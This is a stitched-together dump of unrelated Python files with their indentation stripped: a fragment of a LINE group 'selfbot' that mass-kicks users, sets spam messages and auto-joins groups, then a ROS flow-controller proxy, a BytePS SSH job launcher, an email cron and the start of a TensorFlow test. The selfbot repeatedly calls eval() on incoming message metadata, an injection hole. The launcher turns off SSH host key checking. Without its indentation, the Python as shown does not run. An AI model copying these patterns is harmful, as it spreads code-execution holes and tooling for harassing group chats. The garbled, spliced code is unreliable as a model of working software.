if spl == 'on':
if msg.to in protectjoin:
msgs = "Protect join sudah aktif"
else:
protectjoin.append(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect join diaktifkan\nDi Group : " +str(ginfo.name)
aditmadzs.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectjoin:
protectjoin.remove(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect join dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect join sudah tidak aktif"
aditmadzs.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protectcancel ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectcancel ','')
if spl == 'on':
if msg.to in protectcancel:
msgs = "Protect cancel sudah aktif"
else:
protectcancel.append(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect cancel diaktifkan\nDi Group : " +str(ginfo.name)
aditmadzs.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect cancel dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect cancel sudah tidak aktif"
aditmadzs.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Protectinvite ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectinvite ','')
if spl == 'on':
if msg.to in protectinvite:
msgs = "Protect invite sudah aktif"
else:
protectinvite.append(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect invite diaktifkan\nDi Group : " +str(ginfo.name)
aditmadzs.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectinvite:
protectinvite.remove(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Protect invite dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect invite sudah tidak aktif"
aditmadzs.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Allpro ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Allpro ','')
if spl == 'on':
if msg.to in protectqr:
msgs = ""
else:
protectqr.append(msg.to)
if msg.to in protectkick:
msgs = ""
else:
protectkick.append(msg.to)
if msg.to in protectinvite:
msgs = ""
else:
protectinvite.append(msg.to)
if msg.to in protectjoin:
msgs = ""
else:
protectjoin.append(msg.to)
if msg.to in protectcancel:
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Semua protect sudah on\nDi Group : " +str(ginfo.name)
else:
protectcancel.append(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Berhasil mengaktifkan semua protect\nDi Group : " +str(ginfo.name)
aditmadzs.sendMessage(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
else:
msgs = ""
if msg.to in protectkick:
protectkick.remove(msg.to)
else:
msgs = ""
if msg.to in protectinvite:
protectinvite.remove(msg.to)
else:
msgs = ""
if msg.to in protectjoin:
protectjoin.remove(msg.to)
else:
msgs = ""
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Berhasil menonaktifkan semua protect\nDi Group : " +str(ginfo.name)
else:
ginfo = aditmadzs.getGroup(msg.to)
msgs = "Semua protect sudah off\nDi Group : " +str(ginfo.name)
aditmadzs.sendMessage(msg.to, "「Dinonaktifkan」\n" + msgs)
#===========KICKOUT============#
elif ("Kick1 " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [target])
except:
pass
#===========ADMIN ADD============#
elif ("Adminadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in creator:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
admin[target] = True
f=codecs.open('admin.json','w','utf-8')
json.dump(admin, f, sort_keys=True, indent=4,ensure_ascii=False)
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan admin")
except:
pass
elif ("Staffadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
staff.append(target)
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan staff")
except:
pass
elif ("Botadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
Bots.append(target)
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan bot")
except:
pass
elif ("Admindell " in msg.text):
if msg._from in creator:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del admin[target]
f=codecs.open('admin.json','w','utf-8')
json.dump(admin, f, sort_keys=True, indent=4,ensure_ascii=False)
aditmadzs.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif ("Staffdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Aditmadzs:
try:
staff.remove(target)
aditmadzs.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif ("Botdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Aditmadzs:
try:
Bots.remove(target)
aditmadzs.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif cmd == "admin:on" or text.lower() == 'admin:on':
if msg._from in admin:
wait["addadmin"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif cmd == "admin:delete" or text.lower() == 'admin:delete':
if msg._from in admin:
wait["delladmin"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif cmd == "staff:on" or text.lower() == 'staff:on':
if msg._from in admin:
wait["addstaff"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif cmd == "staff:delete" or text.lower() == 'staff:delete':
if msg._from in admin:
wait["dellstaff"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif cmd == "bot:on" or text.lower() == 'bot:on':
if msg._from in admin:
wait["addbots"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif cmd == "bot:delete" or text.lower() == 'bot:delete':
if msg._from in admin:
wait["dellbots"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif cmd == "refresh" or text.lower() == 'refresh':
if msg._from in admin:
wait["addadmin"] = False
wait["delladmin"] = False
wait["addstaff"] = False
wait["dellstaff"] = False
wait["addbots"] = False
wait["dellbots"] = False
wait["wblacklist"] = False
wait["dblacklist"] = False
wait["Talkwblacklist"] = False
wait["Talkdblacklist"] = False
aditmadzs.sendMessage(msg.to,"Berhasil di Refresh...")
elif cmd == "contact admin" or text.lower() == 'contact admin':
ma = ""
for i in admin:
ma = ki.getContact(i)
ki.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact staff" or text.lower() == 'contact staff':
ma = ""
for i in staff:
ma = ki.getContact(i)
ki.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact bot" or text.lower() == 'contact bot':
ma = ""
for i in Bots:
ma = ki.getContact(i)
ki.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
#===========KOMUT AÇIK KAPALI============#
elif cmd == "notag on" or text.lower() == 'notag on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Mentionkick"] = True
aditmadzs.sendMessage(msg.to,"Notag diaktifkan")
elif cmd == "notag off" or text.lower() == 'notag off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Mentionkick"] = False
aditmadzs.sendMessage(msg.to,"Notag dinonaktifkan")
elif cmd == "contact on" or text.lower() == 'contact on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = True
aditmadzs.sendMessage(msg.to,"Deteksi contact diaktifkan")
elif cmd == "contact off" or text.lower() == 'contact off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = False
aditmadzs.sendMessage(msg.to,"Deteksi contact dinonaktifkan")
elif cmd == "respon on" or text.lower() == 'respon on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = True
aditmadzs.sendMessage(msg.to,"Auto respon diaktifkan")
elif cmd == "respon off" or text.lower() == 'respon off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = False
aditmadzs.sendMessage(msg.to,"Auto respon dinonaktifkan")
elif cmd == "respongift on" or text.lower() == 'respongift on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Mentiongift"] = True
aditmadzs.sendMessage(msg.to,"Auto respon gift diaktifkan")
elif cmd == "respongift off" or text.lower() == 'respongift off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Mentiongift"] = False
aditmadzs.sendMessage(msg.to,"Auto respon gift dinonaktifkan")
elif cmd == "autojoin on" or text.lower() == 'autojoin on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = True
aditmadzs.sendMessage(msg.to,"Autojoin diaktifkan")
elif cmd == "autojoin off" or text.lower() == 'autojoin off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = False
aditmadzs.sendMessage(msg.to,"Autojoin dinonaktifkan")
elif cmd == "autoleave on" or text.lower() == 'autoleave on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = True
aditmadzs.sendMessage(msg.to,"Auto Leave Diaktifkan")
elif cmd == "autoleave off" or text.lower() == 'autoleave off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = False
aditmadzs.sendMessage(msg.to,"Auto Leave Dimatikan")
elif cmd == "autoadd on" or text.lower() == 'autoadd on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = True
aditmadzs.sendMessage(msg.to,"Auto Add Diaktifkan")
elif cmd == "autoadd off" or text.lower() == 'autoadd off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = False
aditmadzs.sendMessage(msg.to,"Auto Add Dimatikan")
elif cmd == "sticker on" or text.lower() == 'sticker on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = True
aditmadzs.sendMessage(msg.to,"Detect Sticker Diaktifkan")
elif cmd == "sticker off" or text.lower() == 'sticker off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = False
aditmadzs.sendMessage(msg.to,"Detect Sticker Dimatikan")
elif cmd == "jointicket on" or text.lower() == 'jointicket on':
if wait["selfbot"] == True:
if msg._from in admin:
settings["autoJoinTicket"] = True
aditmadzs.sendMessage(msg.to,"Auto Join Ticket Diaktifkan")
elif cmd == "jointicket off" or text.lower() == 'jointicket off':
if wait["selfbot"] == True:
if msg._from in admin:
settings["autoJoinTicket"] = False
aditmadzs.sendMessage(msg.to,"Auto Join Ticket Dimatikan")
#===========KOMUT KARA LİSTESİ============#
elif ("Talkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["Talkblacklist"][target] = True
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Untalkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["Talkblacklist"][target]
aditmadzs.sendMessage(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "talkban:on" or text.lower() == 'talkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkwblacklist"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif cmd == "untalkban:on" or text.lower() == 'untalkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkdblacklist"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif ("Ban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Unban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
aditmadzs.sendMessage(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "ban:on" or text.lower() == 'ban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["wblacklist"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif cmd == "unban:on" or text.lower() == 'unban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["dblacklist"] = True
aditmadzs.sendMessage(msg.to,"Kirim kontaknya...")
elif cmd == "banlist" or text.lower() == 'banlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
aditmadzs.sendMessage(msg.to,"Tidak ada blacklist")
else:
ma = ""
a = 0
for m_id in wait["blacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +aditmadzs.getContact(m_id).displayName + "\n"
aditmadzs.sendMessage(msg.to,"⏩ Blacklist User\n\n"+ma+"\nTotal「%s」Blacklist User" %(str(len(wait["blacklist"]))))
elif cmd == "talkbanlist" or text.lower() == 'talkbanlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["Talkblacklist"] == {}:
aditmadzs.sendMessage(msg.to,"Tidak ada Talkban user")
else:
ma = ""
a = 0
for m_id in wait["Talkblacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +aditmadzs.getContact(m_id).displayName + "\n"
aditmadzs.sendMessage(msg.to,"⏩ Talkban User\n\n"+ma+"\nTotal「%s」Talkban User" %(str(len(wait["Talkblacklist"]))))
elif cmd == "blc" or text.lower() == 'blc':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
aditmadzs.sendMessage(msg.to,"Tidak ada blacklist")
else:
ma = ""
for i in wait["blacklist"]:
ma = aditmadzs.getContact(i)
aditmadzs.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "clearban" or text.lower() == 'clearban':
if wait["selfbot"] == True:
if msg._from in admin:
wait["blacklist"] = {}
ragets = aditmadzs.getContacts(wait["blacklist"])
mc = "���%i」User Blacklist" % len(ragets)
aditmadzs.sendMessage(msg.to,"Sukses membersihkan " +mc)
#===========KOMUT SETİ============#
elif 'Set pesan: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set pesan: ','')
if spl in [""," ","\n",None]:
aditmadzs.sendMessage(msg.to, "Gagal mengganti Pesan Message")
else:
wait["message"] = spl
aditmadzs.sendMessage(msg.to, "「Pesan Msg」\nPesan Message diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set welcome: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set welcome: ','')
if spl in [""," ","\n",None]:
aditmadzs.sendMessage(msg.to, "Gagal mengganti Welcome Message")
else:
wait["welcome"] = spl
aditmadzs.sendMessage(msg.to, "「Welcome Msg」\nWelcome Message diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set leave: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set leave: ','')
if spl in [""," ","\n",None]:
aditmadzs.sendMessage(msg.to, "Gagal mengganti Leave Message")
else:
wait["leave"] = spl
aditmadzs.sendMessage(msg.to, "「Leave Msg」\nLeave Message diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set respon: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set respon: ','')
if spl in [""," ","\n",None]:
aditmadzs.sendMessage(msg.to, "Gagal mengganti Respon Message")
else:
wait["Respontag"] = spl
aditmadzs.sendMessage(msg.to, "「Respon Msg」\nRespon Message diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set spam: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set spam: ','')
if spl in [""," ","\n",None]:
aditmadzs.sendMessage(msg.to, "Gagal mengganti Spam")
else:
Setmain["ADITMADZSmessage1"] = spl
aditmadzs.sendMessage(msg.to, "「Spam Msg」\nSpam Message diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set sider: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set sider: ','')
if spl in [""," ","\n",None]:
aditmadzs.sendMessage(msg.to, "Gagal mengganti Sider Message")
else:
wait["mention"] = spl
aditmadzs.sendMessage(msg.to, "「Sider Msg」\nSider Message diganti jadi :\n\n「{}」".format(str(spl)))
elif text.lower() == "cek pesan":
if msg._from in admin:
aditmadzs.sendMessage(msg.to, "「Pesan Msg」\nPesan Message lu :\n\n「 " + str(wait["message"]) + " 」")
elif text.lower() == "cek welcome":
if msg._from in admin:
aditmadzs.sendMessage(msg.to, "「Welcome Msg」\nWelcome Message lu :\n\n「 " + str(wait["welcome"]) + " 」")
elif text.lower() == "cek leave":
if msg._from in admin:
aditmadzs.sendMessage(msg.to, "「Leave Msg」\nLeave Message lu :\n\n「 " + str(wait["leave"]) + " 」")
elif text.lower() == "cek respon":
if msg._from in admin:
aditmadzs.sendMessage(msg.to, "「Respon Msg」\nRespon Message lu :\n\n「 " + str(wait["Respontag"]) + " 」")
elif text.lower() == "cek spam":
if msg._from in admin:
aditmadzs.sendMessage(msg.to, "「Spam Msg」\nSpam Message lu :\n\n「 " + str(Setmain["ADITMADZSmessage1"]) + " 」")
elif text.lower() == "cek sider":
if msg._from in admin:
aditmadzs.sendMessage(msg.to, "「Sider Msg」\nSider Message lu :\n\n「 " + str(wait["mention"]) + " 」")
#===========BİLETE KATIL============#
elif "/ti/g/" in msg.text.lower():
if wait["selfbot"] == True:
if settings["autoJoinTicket"] == True:
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group = aditmadzs.findGroupByTicket(ticket_id)
aditmadzs.acceptGroupInvitationByTicket(group.id,ticket_id)
aditmadzs.sendMessage(msg.to, "AditmadzsOTW MASUK KE GROUP : %s" % str(group.name))
group1 = ki.findGroupByTicket(ticket_id)
ki.acceptGroupInvitationByTicket(group1.id,ticket_id)
ki.sendMessage(msg.to, "Aditmadzs OTW MASUK KE GROUP : %s" % str(group.name))
except Exception as error:
print (error)
while True:
try:
ops = poll.singleTrace(count=50)
if ops is not None:
for op in ops:
# bot(op)
# Don't remove this line, if you wan't get error soon!
poll.setRevision(op.revision)
thread1 = threading.Thread(target=bot, args=(op,))#self.OpInterrupt[op.type], args=(op,)
#thread1.daemon = True
thread1.start()
thread1.join()
except Exception as e:
pass
© 2020 GitHub, Inc.
Terms
Privacy
Security
Status
Help
Contact GitHub
Pricing
API
Training
Blog
About
|
alicat_ros_proxy.py | from __future__ import print_function
import rospy
import threading
import Queue
from alicat_ros.srv import SetFlowRate
from alicat_ros.msg import DeviceSetPoint
class AlicatProxyException(Exception):
pass
class AlicatProxy(object):
def __init__(self,namespace=None,use_thread=True):
self.namespace = namespace
self.use_thread = use_thread
self.service_name = 'alicat_set_flow_rate'
if self.namespace is not None:
self.service_name = '/{}/{}'.format(self.namespace,self.service_name)
rospy.wait_for_service(self.service_name)
if self.use_thread:
self.proxy_queue = Queue.Queue()
self.proxy_thread = threading.Thread(target=self.proxy_target)
self.proxy_thread.daemon = True
self.proxy_thread.start()
else:
self.set_flow_rate_proxy = rospy.ServiceProxy(self.service_name,SetFlowRate)
def set_flow_rate(self,set_point_dict):
set_point_list = []
for addr,rate in set_point_dict.items():
set_point_list.append(DeviceSetPoint(addr,rate))
#for item in set_point_list:
# print(item)
if self.use_thread:
self.proxy_queue.put(set_point_list)
else:
rsp = self.set_flow_rate_proxy(set_point_list)
def proxy_target(self):
set_flow_rate_proxy = rospy.ServiceProxy(self.service_name,SetFlowRate)
while True:
try:
set_point_list = self.proxy_queue.get_nowait()
except Queue.Empty:
continue
rsp = set_flow_rate_proxy(set_point_list)
# Testing
# ---------------------------------------------------------------------------------------
if __name__ == '__main__':
import time
def get_set_point_dict(addr, addr_list, value):
set_point_dict = {}
for addr_tmp in addr_list:
if addr_tmp == addr:
set_point_dict[addr_tmp] = value
else:
set_point_dict[addr_tmp] = 0.0
return set_point_dict
proxy = AlicatProxy()
addr_list = ['A','B','C','D','E','F']
rate_list = [1.0, 0.0]
sleep_dt = 5.0
for i, addr in enumerate(addr_list):
for rate in rate_list:
print('{}/{}, addr={}: settiing flow rate to {}'.format(i+1,len(addr_list),addr,rate))
set_point_dict = get_set_point_dict(addr, addr_list, rate)
proxy.set_flow_rate(set_point_dict)
time.sleep(sleep_dt)
print('done')
|
dist_launcher.py | #!/usr/bin/python
"""
Launch a distributed job for BytePS
"""
import argparse
import os, sys
import signal
import logging
import subprocess
from multiprocessing import Pool, Process
from threading import Thread
def preprocess_envs(args_envs):
envs_map = {}
for item in args_envs:
i = item.find(":")
if i != -1:
key = item[:i]
val = item[i+1:]
envs_map[key] = val
return envs_map
def get_env(envs_map):
envs = []
# get system envs
keys = ['OMP_NUM_THREADS', 'KMP_AFFINITY']
for k in keys:
v = os.getenv(k)
if v is not None:
envs.append('export ' + k + '=' + v + ';')
# get ass_envs
for k, v in envs_map.items():
envs.append('export ' + str(k) + '=' + str(v) + ';')
return (' '.join(envs))
def get_hosts_from_file(filename):
with open(filename) as f:
tmp = f.readlines()
assert len(tmp) > 0
hosts = []
for h in tmp:
if len(h.strip()) > 0:
# parse addresses of the form ip:port
h = h.strip()
i = h.find(":")
p = "22"
if i != -1:
p = h[i+1:]
h = h[:i]
# hosts now contain the pair ip, port
hosts.append((h, p))
return hosts
def start_ssh(prog, node, port, username, fname):
def run(prog):
subprocess.check_call(prog, shell=True)
dirname = 'sshlog'
if not os.path.exists(dirname):
os.mkdir(dirname)
pname = dirname + '/' + fname
if username is not None:
prog = 'ssh -o StrictHostKeyChecking=no ' + ' -l ' + username \
+ ' ' + node + ' -p ' + port + ' \'' + prog + '\'' \
+ ' > ' + pname + '.stdout' + ' 2>' + pname + '.stderr&'
else:
prog = 'ssh -o StrictHostKeyChecking=no ' + node + ' -p ' + port + ' \'' + prog + '\'' \
+ ' > ' + pname + '.stdout' + ' 2>' + pname + '.stderr&'
thread = Thread(target=run, args=(prog,))
thread.setDaemon(True)
thread.start()
return thread
def submit(args):
worker_hosts = get_hosts_from_file(args.worker_hostfile)
server_hosts = get_hosts_from_file(args.server_hostfile)
num_worker = len(worker_hosts)
num_server = len(server_hosts)
assert num_worker >= 1
assert num_server >= 1
print('Launch %d workers and %d servers' % (num_worker, num_server))
# common env
pass_envs = preprocess_envs(args.env)
pass_envs['DMLC_NUM_WORKER'] = str(num_worker)
pass_envs['DMLC_NUM_SERVER'] = str(num_server)
pass_envs['DMLC_INTERFACE'] = str(args.interface)
pass_envs['DMLC_PS_ROOT_URI'] = str(args.scheduler_ip)
pass_envs['DMLC_PS_ROOT_PORT'] = str(args.scheduler_port)
username = ''
if args.username is not None:
username = args.username
threads = []
for (node, port) in [(args.scheduler_ip, args.scheduler_ssh_port)]:
name = 'scheduler'
pass_envs['DMLC_ROLE'] = name
prog = get_env(pass_envs) + (' '.join(args.command))
threads.append(start_ssh(prog, node, port, username, name))
for i, (node, port) in enumerate(worker_hosts):
name = 'worker'
pass_envs['DMLC_ROLE'] = name
pass_envs['DMLC_WORKER_ID'] = str(i)
prog = get_env(pass_envs) + (' '.join(args.command))
threads.append(start_ssh(prog, node, port, username, name + str(i)))
for i, (node, port) in enumerate(server_hosts):
name = 'server'
pass_envs['DMLC_ROLE'] = name
prog = get_env(pass_envs) + (' '.join(args.command))
threads.append(start_ssh(prog, node, port, username, name + str(i)))
for t in threads:
t.join()
def main():
parser = argparse.ArgumentParser(description='Launch a distributed training job for BytePS')
parser.add_argument('-WH', '--worker-hostfile', required=True, type=str,
help = 'the hostfile of worker machines which will run the job.')
parser.add_argument('-SH', '--server-hostfile', required=True, type=str,
help = 'the hostfile of server machines which will run the job.')
parser.add_argument('--scheduler-ip', required=True, type=str,
help = 'the ip address of the scheduler')
parser.add_argument('--scheduler-port', required=True, type=int,
help = 'the port of the scheduler')
parser.add_argument('--interface', type=str, default='eth0',
help = 'the network interface to use')
parser.add_argument('--env', action='append', default=[],
help = 'Given a pair of environment_variable:value, sets this value of \
environment variable for all workers and servers. Example OMP_NUM_THREADS:3')
parser.add_argument('--username', type=str,
help = 'the username for ssh')
parser.add_argument('--scheduler-ssh-port', type=str, default='22',
help = 'the ssh port of the scheduler')
parser.add_argument('command', nargs='+',
help = 'command for launching the program')
args = parser.parse_args()
# check necessary args
assert args.worker_hostfile
assert args.server_hostfile
assert args.scheduler_ip
assert args.scheduler_port
submit(args)
def signal_handler(signal, frame):
logging.info('Stop launcher')
sys.exit(0)
if __name__ == '__main__':
fmt = '%(asctime)s %(levelname)s %(message)s'
logging.basicConfig(format=fmt, level=logging.INFO)
signal.signal(signal.SIGINT, signal_handler)
main()
|
email_cron.py | import threading
import time
import sys
import utils.logs as logs
import time
import os
from utils.sendemail import send_email
from utils.config import get_value
from utils.db import Database_update
try:
from API.scanstatus import scan_status
except Exception as e:
SCRIPT_PATH= os.path.split(os.path.realpath(__file__))[0]
sys.path.append(os.path.join(SCRIPT_PATH,'..','API'))
from scanstatus import scan_status
email_db = Database_update()
emails = send_email()
def send_email_notification():
time.sleep(20)
while True:
try:
schedule = get_value('config.property','SMTP','email_schedule')
records = email_db.db.email.find({})
for data in records:
notification = data['email_notification']
scan_id = data['scanid']
scan_result = scan_status(scan_id)
if notification == 'N' and scan_result == 'Completed':
try:
email = data['to_email']
email_result = emails.main_email(scan_id,email)
if email_result is False:
print ("failed to connect to SMTP server")
return
email_db.db.email.update({'email_notification' : 'N'},{"$set" : {'email_notification' : 'Y'}})
except:
pass
time.sleep(int(schedule))
except Exception as e:
logs.logging.info("Invalid email schedule argument "+str(e))
sys.exit(1)
def email_start_cron():
email_notification = get_value('config.property','SMTP','email_notification')
if email_notification == "y" or email_notification == "Y":
# Start the thread
#time.sleep(20)
t = threading.Thread(target=send_email_notification)
t.deamon = True
t.start()
logs.logging.info("started")
else:
logs.logging.info("Email notification is not enabled") |
monitored_session_test.py | # pylint: disable=g-bad-file-header
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for monitored_session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import glob
import os
import sys
import threading
import time
import traceback
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import debug_pb2
from tensorflow.python.client import session as session_lib
from tensorflow.python.distribute import collective_all_reduce_strategy
from tensorflow.python.distribute import distribute_coordinator
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import checkpoint_management
from tensorflow.python.training import coordinator
from tensorflow.python.training import monitored_session
from tensorflow.python.training import saver as saver_lib
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import summary_io
from tensorflow.python.training import training_util
def latest_summaries(base_dir):
"""Parse summary events from latest event file in base_dir."""
file_paths = glob.glob(os.path.join(base_dir, 'events.*'))
file_path = sorted(file_paths)[-1] if file_paths else None
latest_events = summary_io.summary_iterator(file_path) if file_path else []
return [e for e in latest_events if e.HasField('summary')]
class ScaffoldTest(test.TestCase):
"""Scaffold tests."""
def test_nothing_created_before_finalize(self):
with ops.Graph().as_default():
scaffold = monitored_session.Scaffold()
self.assertEqual(None, scaffold.init_op)
self.assertEqual(None, scaffold.init_feed_dict)
self.assertEqual(None, scaffold.init_fn)
self.assertEqual(None, scaffold.ready_op)
self.assertEqual(None, scaffold.ready_for_local_init_op)
self.assertEqual(None, scaffold.local_init_op)
self.assertEqual(None, scaffold.saver)
def test_defaults_empty_graph(self):
with ops.Graph().as_default():
scaffold = monitored_session.Scaffold()
variables.VariableV1(1, name='my_var')
variables.VariableV1(
2, name='my_local_var', collections=[ops.GraphKeys.LOCAL_VARIABLES])
scaffold.finalize()
